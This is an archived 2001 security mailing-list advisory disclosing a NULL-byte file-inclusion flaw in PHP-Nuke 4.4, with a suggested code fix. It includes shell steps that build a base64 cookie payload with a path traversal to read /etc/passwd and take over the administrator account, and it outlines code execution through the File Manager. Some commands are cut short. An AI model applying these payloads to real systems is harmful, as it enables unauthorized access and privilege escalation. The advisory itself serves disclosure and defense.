Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: Joao Gouveia (tharbadKAOTIK.ORG)
Date: Fri Feb 23 2001 - 19:44:05 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]


    This is yet another security flaw in PHP-Nuke, greatly inpired by RFP
    post do bugtraq (http://www.securityfocus.com/archive/1/162703).

    Tested on:
    PHP-Nuke v.4.4 (latest version, step-by-step install)
    PHP Version 4.0.4pl1

    Impact: Any user can gain administrator previleges. Every file that the
    webserver has access to, can be read by anyone. Any user can execute
    with the previleges of the web server.

    Fix: version 4.4.1 has been released, for a quick fix see below

    PHP in some functions, like for example fopen(), include(), require(),
    ignores everything after a NULL if one is present.
    <snip php.ini>
    magic_quotes_gpc = On ; magic quotes for incoming GET/POST/Cookie data
    <? echo $string?>


    now, with magic_quotes_gpc turned Off.

    The same two tests aplied to an include($string)
    magic_quotes_gpc On, output: Warning: Failed opening 'tes\0t' for
    magic_quotes_gpc Off, output: Warning: Failed opening 'tes' for
    So, everything after the NULL was ignored.

    Of course, one that who uses magic_quotes_gpc turned on isn't expecting this
    kind of behaviour.
    The problem here, as RFP noted in his post to bugtraq, is that PHP-Nuke
    uses base64_encode() to encode it's cookies, and the user information.
    In this vars there is a interesting one, the theme configuration ( also
    pointed out by RFP ). The same thing that makes phpnuke not escape the '
    , also makes it not escape the NULL. So, here's an example:
    <snip of bb_smilies.php> (Note: 'bbcode_ref.php' has the same problem)
    if ($user) {
                    $user = base64_decode($user);
                    $userdata = explode(":", $user);

    if ($userdata[9] != '') $themes = "themes/$userdata[9]/theme.php";
    else $themes = "themes/$Default_Theme/theme.php";

    include ("$themes");

    Here's a simple way to get /etc/passwd:
    jrobertospike:~ > /bin/echo -e
    "1:1:1:1:1:1:1:1:1:../../../../../etc/passwd\000" |uuencode -m f
    begin-base64 644 f
    jrobertospike:~ > wget
    -O target.passwd
    jrobertospike:~ > head -n1 target.passwd

    And, with a litle imagination, here's another way to change the default
    administrator (God) password:
    jrobertospike:~ > /bin/echo -e
    jrobertospike:~ > uuencode -m lixo lixo2
    begin-base64 644 lixo2
    jrobertospike:~ > wget
    -O test

    And here's a simple way to execute arbitrary code on the server ( given that
    it's not running in safe_mode and filemanager is working).
    After geting administration previleges, go to the admin area and give "God"
    superuser privs ( if it isn't enabled ).
    Switch to the File Manager area, edit/create/rename your choosen file and
    insert your php code there.


    Both in bb_smilies.php and bbcode_ref.php change:
    if ($userdata[9] != '') $themes = "themes/$userdata[9]/theme.php";
    else $themes = "themes/$Default_Theme/theme.php";


    if ($userdata[9] != '') $themes = "themes/$userdata[9]/theme.php";
    else $themes = "themes/$Default_Theme/theme.php";
    if ( !(strstr(basename($themes),"theme.php")) || !(file_exists($themes)) ){
    echo "Invalid Theme"; exit;}
    include ("$themes");

    Best regards,

    Joao Gouveia